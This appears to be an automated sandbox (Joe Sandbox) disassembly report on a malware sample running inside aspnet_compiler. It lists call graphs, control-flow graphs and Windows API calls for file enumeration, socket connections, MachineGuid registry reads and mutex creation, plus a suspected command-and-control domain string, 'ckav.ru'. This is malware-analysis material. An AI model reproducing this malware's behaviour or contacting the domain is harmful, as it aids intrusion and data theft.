9891->9893 9894 40d529 9893->9894 9895 404bee 6 API calls 9894->9895 9896 40d537 9895->9896 9897 404bee 6 API calls 9896->9897 9898 40d546 9897->9898 9898->9892 9899 405872 4 API calls 9898->9899 9900 40d56d 9899->9900 9901 405872 4 API calls 9900->9901 9902 40d57c 9901->9902 9903 405872 4 API calls 9902->9903 9904 40d58e 9903->9904 9905 405872 4 API calls 9904->9905 9905->9892 9906 40a3ea 9907 40374e 6 API calls 9906->9907 9908 40a403 9907->9908 9909 40a419 9908->9909 9910 4059d8 4 API calls 9908->9910 9911 40a411 9910->9911 9912 402bab 2 API calls 9911->9912 9912->9909 9295 404df3 WSAStartup 9299 4091f6 9300 404b22 6 API calls 9299->9300 9301 40920b 9300->9301 9302 409222 9301->9302 9303 409408 16 API calls 9301->9303 9304 40921c 9303->9304 9305 402bab 2 API calls 9304->9305 9305->9302 9939 4117fe 9940 404c4e 6 API calls 9939->9940 9941 411888 9940->9941 9942 411925 9941->9942 9943 404c4e 6 API calls 9941->9943 9944 4118ab 9943->9944 9944->9942 9958 4119b3 9944->9958 9946 4118c5 9947 4119b3 4 API calls 9946->9947 9948 4118d0 9947->9948 9948->9942 9949 4056bf 2 API calls 9948->9949 9950 4118fd 9949->9950 9951 405872 4 API calls 9950->9951 9952 41190a 9951->9952 9953 405872 4 API calls 9952->9953 9954 411915 9953->9954 9955 413aca 4 API calls 9954->9955 9956 41191f 9955->9956 9957 405695 2 API calls 9956->9957 9957->9942 9959 4119c6 9958->9959 9961 4119bf 9958->9961 9960 4031e5 4 API calls 9959->9960 9960->9961 9961->9946 9309 40e880 9310 41219c 15 API calls 9309->9310 9311 40e88e 9310->9311 9312 41219c 15 API calls 9311->9312 9313 40e89c 9312->9313 10025 40e48a 10026 404bee 6 API calls 10025->10026 10028 40e4d0 10026->10028 10027 40e4f4 10028->10027 10029 405872 4 API calls 10028->10029 10029->10027 9410 410390 9411 404b22 6 API calls 9410->9411 9412 4103a5 9411->9412 9413 410409 9412->9413 9414 405b6f 6 API calls 9412->9414 9417 4103ba 9414->9417 9415 402bab 2 API calls 9415->9413 9416 402bab 2 API calls 9418 410402 9416->9418 9417->9418 9419 403d74 7 API calls 9417->9419 9422 4103fb 9417->9422 9418->9415 9420 4103ee 9419->9420 9421 402bab 2 API calls 9420->9421 9420->9422 9421->9422 9422->9416 10040 40ed96 10041 4040bb 13 API calls 10040->10041 10055 40edb0 10041->10055 10042 40ef90 10043 40ef87 10044 403f9e 5 API calls 10043->10044 10044->10042 10045 405ae9 6 API calls 10045->10055 10046 412269 6 API calls 10046->10055 10047 40ef61 10048 40ef6e 10047->10048 10050 402bab 2 API calls 10047->10050 10051 40ef7c 10048->10051 10052 402bab 2 API calls 10048->10052 10049 402bab GetProcessHeap RtlFreeHeap 10049->10055 10050->10048 10051->10043 10054 402bab 2 API calls 10051->10054 10052->10051 10053 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10053->10055 10054->10043 10055->10042 10055->10043 10055->10045 10055->10046 10055->10047 10055->10049 10055->10053 10056 40ef98 10057 404c4e 6 API calls 10056->10057 10058 40efb6 10057->10058 10070 40f02a 10058->10070 10071 40f054 10058->10071 10061 404bee 6 API calls 10062 40efda 10061->10062 10063 404bee 6 API calls 10062->10063 10064 40efe9 10063->10064 10065 405872 4 API calls 10064->10065 10064->10070 10066 40f008 10065->10066 10067 405872 4 API calls 10066->10067 10068 40f01a 10067->10068 10069 405872 4 API calls 10068->10069 10069->10070 10072 40f064 10071->10072 10073 402b7c 2 API calls 10072->10073 10075 40f072 10073->10075 10074 40efca 10074->10061 10075->10074 10077 405ecd 10075->10077 10078 4059b8 4 API calls 10077->10078 10079 405edf 10078->10079 10079->10075 9429 410c98 9430 41219c 15 API calls 9429->9430 9431 410ca8 9430->9431 9432 41219c 15 API calls 9431->9432 9433 410cb5 9432->9433 9434 412093 8 API calls 9433->9434 9435 410cc9 9434->9435 10149 41249c 10150 4056bf 2 API calls 10149->10150 10151 4124aa 10150->10151 10152 4057df 14 API calls 10151->10152 10157 4124ce 10151->10157 10153 4124be 10152->10153 10154 413aca 4 API calls 10153->10154 10155 4124c8 10154->10155 10156 405695 2 API calls 10155->10156 10156->10157 9439 40f49e 9440 40f4b6 14 API calls 9439->9440 9441 40f4a8 9440->9441 9442 40929e 9443 413b28 6 API calls 9442->9443 9444 4092a4 9443->9444 9445 405b6f 6 API calls 9444->9445 9446 4092af 9445->9446 9447 4092c5 9446->9447 9448 409408 16 API calls 9446->9448 9449 4092bf 9448->9449 9450 402bab 2 API calls 9449->9450 9450->9447 10255 407fa4 10256 407fb7 10255->10256 10257 402b7c 2 API calls 10256->10257 10259 407fee 10256->10259 10258 40800d 10257->10258 10258->10259 10260 4037be 4 API calls 10258->10260 10261 40803c 10260->10261 10262 402bab 2 API calls 10261->10262 10262->10259 9487 4090aa 9488 404b22 6 API calls 9487->9488 9489 4090c1 9488->9489 9490 4090d8 9489->9490 9491 409408 16 API calls 9489->9491 9492 404b22 6 API calls 9490->9492 9493 4090d2 9491->9493 9494 4090eb 9492->9494 9495 402bab 2 API calls 9493->9495 9496 408c4d 16 API calls 9494->9496 9499 409104 9494->9499 9495->9490 9497 4090fe 9496->9497 9498 402bab 2 API calls 9497->9498 9498->9499 9506 409cae 9521 404b79 9506->9521 9508 409cc5 9509 409d27 9508->9509 9510 405b6f 6 API calls 9508->9510 9512 409d2f 9508->9512 9511 402bab 2 API calls 9509->9511 9513 409cec 9510->9513 9511->9512 9513->9509 9514 404b79 6 API calls 9513->9514 9515 409d05 9514->9515 9516 409d1e 9515->9516 9517 408c4d 16 API calls 9515->9517 9518 402bab 2 API calls 9516->9518 9519 409d18 9517->9519 9518->9509 9520 402bab 2 API calls 9519->9520 9520->9516 9522 404b22 6 API calls 9521->9522 9523 404b8a 9522->9523 9523->9508 10322 411fb3 10323 405b6f 6 API calls 10322->10323 10324 412013 10323->10324 10327 412075 10324->10327 10329 41206a 10324->10329 10341 411a8d 10324->10341 10326 402bab 2 API calls 10326->10327 10329->10326 10330 4056bf 2 API calls 10331 41203d 10330->10331 10332 405872 4 API calls 10331->10332 10333 41204a 10332->10333 10334 413aca 4 API calls 10333->10334 10335 412054 10334->10335 10336 405695 2 API calls 10335->10336 10337 41205a 10336->10337 10338 413a58 14 API calls 10337->10338 10339 412064 10338->10339 10340 402bab 2 API calls 10339->10340 10340->10329 10342 402b7c 2 API calls 10341->10342 10343 411aa3 10342->10343 10351 411f05 10343->10351 10364 404ada 10343->10364 10346 404ada 4 API calls 10347 411cad 10346->10347 10348 411f0c 10347->10348 10349 411cc0 10347->10349 10350 402bab 2 API calls 10348->10350 10367 405eb6 10349->10367 10350->10351 10351->10329 10351->10330 10353 411d3c 10354 4031e5 4 API calls 10353->10354 10362 411d7b 10354->10362 10355 411ea6 10356 4031e5 4 API calls 10355->10356 10357 411eb5 10356->10357 10358 4031e5 4 API calls 10357->10358 10359 411ed6 10358->10359 10360 405eb6 4 API calls 10359->10360 10360->10351 10361 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10361->10362 10362->10355 10362->10361 10363 405eb6 4 API calls 10362->10363 10363->10362 10365 4031e5 4 API calls 10364->10365 10366 404afd 10365->10366 10366->10346 10368 405998 4 API calls 10367->10368 10369 405ec8 10368->10369 10369->10353 9553 40f6b8 9554 41219c 15 API calls 9553->9554 9555 40f6c7 9554->9555 9556 41219c 15 API calls 9555->9556 9557 40f6d5 9556->9557 9558 41219c 15 API calls 9557->9558 9559 40f6df 9558->9559 9578 40d6bd 9579 4056bf 2 API calls 9578->9579 9580 40d6c9 9579->9580 9591 404cbf 9580->9591 9583 404cbf 8 API calls 9584 40d6f4 9583->9584 9585 404cbf 8 API calls 9584->9585 9586 40d702 9585->9586 9587 413aca 4 API calls 9586->9587 9588 40d711 9587->9588 9589 405695 2 API calls 9588->9589 9590 40d71f 9589->9590 9592 402b7c 2 API calls 9591->9592 9593 404ccd 9592->9593 9594 404ddc 9593->9594 9595 404b8f 5 API calls 9593->9595 9594->9583 9596 404ce4 9595->9596 9597 404dd4 9596->9597 9599 402b7c 2 API calls 9596->9599 9598 402bab 2 API calls 9597->9598 9598->9594 9602 404d04 9599->9602 9600 404dcc 9601 404a39 5 API calls 9600->9601 9601->9597 9602->9600 9603 404dc6 9602->9603 9604 402b7c 2 API calls 9602->9604 9606 404b8f 5 API calls 9602->9606 9607 402bab GetProcessHeap RtlFreeHeap 9602->9607 9608 404a39 5 API calls 9602->9608 9609 405b6f 6 API calls 9602->9609 9610 404cbf 8 API calls 9602->9610 9605 402bab 2 API calls 9603->9605 9604->9602 9605->9600 9606->9602 9607->9602 9608->9602 9609->9602 9610->9602 9611 40f0bf 9612 4056bf 2 API calls 9611->9612 9613 40f0c9 9612->9613 9614 40f115 9613->9614 9616 404cbf 8 API calls 9613->9616 9615 41219c 15 API calls 9614->9615 9617 40f128 9615->9617 9618 40f0ed 9616->9618 9619 404cbf 8 API calls 9618->9619 9620 40f0fb 9619->9620 9621 413aca 4 API calls 9620->9621 9622 40f10a 9621->9622 9623 405695 2 API calls 9622->9623 9623->9614

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 101 403d74-403d90 call 4067c4 104 403d96-403da9 call 405b6f 101->104 105 403ea9-403ec0 call 405b6f 101->105 112 403ea6-403ea8 104->112 113 403daf-403dcb call 4031e5 104->113 110 403f95 105->110 111 403ec6-403ee2 call 4031e5 FindFirstFileW 105->111 115 403f97-403f9d 110->115 119 403ee8-403ef8 call 405d24 111->119 120 403f8e-403f94 call 402bab 111->120 112->105 126 403dd1-403dd8 113->126 127 403e9d-403ea4 call 402bab 113->127 128 403f03-403f0a 119->128 129 403efa-403f01 119->129 120->110 131 403e75-403e90 call 4031e5 126->131 132 403dde-403de2 126->132 127->112 135 403f12-403f2d call 405b6f 128->135 136 403f0c-403f10 128->136 129->128 134 403f41-403f5c call 4031e5 129->134 131->126 155 403e96-403e9c call 403bef 131->155 138 403e12-403e22 call 405d24 132->138 139 403de4-403df9 call 405eff 132->139 162 403f87-403f8d call 403bef 134->162 163 403f5e-403f61 134->163 135->134 153 403f2f-403f33 135->153 136->134 136->135 151 403e30-403e4c call 405b6f 138->151 152 403e24-403e2e 138->152 139->131 149 403dfb-403e10 call 405eff 139->149 149->131 149->138 151->131 168 403e4e-403e6f call 403d74 call 402bab 151->168 152->131 152->151 158 403f75-403f85 call 402bab call 403bef 153->158 159 403f35-403f40 call 402bab 153->159 155->127 158->115 159->134 162->120 163->119 168->131 180 403f63-403f73 call 402bab call 403bef 168->180 180->115
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID: %s\%s$%s\*$Program Files$Windows
                                                  • API String ID: 1974802433-2009209621
                                                  • Opcode ID: ba89cf93251e39584731f3d6e5c053cf465788abbe1bca3e8a88947a019726ef
                                                  • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                                  • Opcode Fuzzy Hash: ba89cf93251e39584731f3d6e5c053cf465788abbe1bca3e8a88947a019726ef
                                                  • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateProcess
                                                  • String ID:
                                                  • API String ID: 1357844191-0
                                                  • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                  • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                  • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                  • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: recv
                                                  • String ID:
                                                  • API String ID: 1507349165-0
                                                  • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                  • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                  • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                  • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                                  • _wmemset.LIBCMT ref: 00406244
                                                  • _wmemset.LIBCMT ref: 00406261
                                                  • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wmemset$ErrorInformationLastToken
                                                  • String ID: IDA$IDA
                                                  • API String ID: 487585393-2020647798
                                                  • Opcode ID: 1f028961ec1ed3c75f428258fc75133e0b514cd312a430588f71e49b327cd99e
                                                  • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                  • Opcode Fuzzy Hash: 1f028961ec1ed3c75f428258fc75133e0b514cd312a430588f71e49b327cd99e
                                                  • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 439 404e17-404e57 getaddrinfo 440 404e59-404e5b 439->440 441 404e5d-404e84 call 402b7c socket 439->441 442 404ecf-404ed3 440->442 445 404e86-404e96 call 402bab freeaddrinfo 441->445 446 404e98-404ea7 connect 441->446 454 404ec7-404ec9 445->454 448 404eb3-404ebe freeaddrinfo 446->448 449 404ea9-404eb1 call 404de5 446->449 452 404ec0-404ec6 call 402bab 448->452 453 404ecb 448->453 449->448 452->454 457 404ecd-404ece 453->457 454->457 457->442
                                                  APIs
                                                  • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                  • socket.WS2_32(?,?,?), ref: 00404E7A
                                                  • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: freeaddrinfogetaddrinfosocket
                                                  • String ID:
                                                  • API String ID: 2479546573-0
                                                  • Opcode ID: f3961944380a1dba1fed29402a4b94b30b75c90acdc8c1f36bcdbe15725494dc
                                                  • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                  • Opcode Fuzzy Hash: f3961944380a1dba1fed29402a4b94b30b75c90acdc8c1f36bcdbe15725494dc
                                                  • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 459 4040bb-4040f2 call 4031e5 CreateFileW 462 4040f8-404111 call 4031e5 459->462 463 40418d-404190 459->463 473 404113-404119 462->473 474 40417a 462->474 465 404192-4041a7 call 403c90 463->465 466 404184 463->466 465->466 472 4041a9-4041b8 call 403c59 465->472 468 404186-40418c 466->468 479 4041ba-4041d8 call 4040bb call 403d44 472->479 480 4041db-4041e4 call 402bab 472->480 473->474 478 40411b-404120 473->478 477 40417d-40417e call 403c40 474->477 486 404183 477->486 482 404122 478->482 483 404124-404140 call 4031e5 VirtualAlloc 478->483 479->480 480->468 482->483 483->474 492 404142-40415e call 4031e5 ReadFile 483->492 486->466 492->477 496 404160-404178 call 4031e5 492->496 496->477
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AllocCreateReadVirtual
                                                  • String ID: .tmp
                                                  • API String ID: 3585551309-2986845003
                                                  • Opcode ID: f0b70a0fa2ce9f3aed2e2fb30e0a7af12988fdbd779b5d3696659e25893cc5c3
                                                  • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                                  • Opcode Fuzzy Hash: f0b70a0fa2ce9f3aed2e2fb30e0a7af12988fdbd779b5d3696659e25893cc5c3
                                                  • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                  • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                  • GetLastError.KERNEL32 ref: 0041399E
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Error$CreateLastModeMutex
                                                  • String ID:
                                                  • API String ID: 3448925889-0
                                                  • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                  • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                  • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                  • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                                  • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CreatePointerWrite
                                                  • String ID:
                                                  • API String ID: 3672724799-0
                                                  • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                  • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                                  • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                  • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                    • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                    • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                    • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$CreateFreeProcessThread_wmemset
                                                  • String ID: ckav.ru
                                                  • API String ID: 2915393847-2696028687
                                                  • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                                  • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                                  • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                                                  • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                  • _wmemset.LIBCMT ref: 0040634F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateProcess_wmemset
                                                  • String ID: CA
                                                  • API String ID: 2773065342-1052703068
                                                  • Opcode ID: d67df391eaf52e7041b539f43b4c30e8bac4520f3636b6a15260aeb5ddb41f23
                                                  • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                                  • Opcode Fuzzy Hash: d67df391eaf52e7041b539f43b4c30e8bac4520f3636b6a15260aeb5ddb41f23
                                                  • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InformationToken
                                                  • String ID: IDA
                                                  • API String ID: 4114910276-365204570
                                                  • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                  • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                                  • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                  • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc
                                                  • String ID: s1@
                                                  • API String ID: 190572456-427247929
                                                  • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                  • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                                  • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                                  • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                    • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                  • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                                  • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateOpenProcessQueryValue
                                                  • String ID:
                                                  • API String ID: 1425999871-0
                                                  • Opcode ID: 7b25cb1320f699495a3842f9950f6c7efed9fd97b6141ec9a7892f130df46c4f
                                                  • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                                  • Opcode Fuzzy Hash: 7b25cb1320f699495a3842f9950f6c7efed9fd97b6141ec9a7892f130df46c4f
                                                  • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                  • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$FreeProcess
                                                  • String ID:
                                                  • API String ID: 3859560861-0
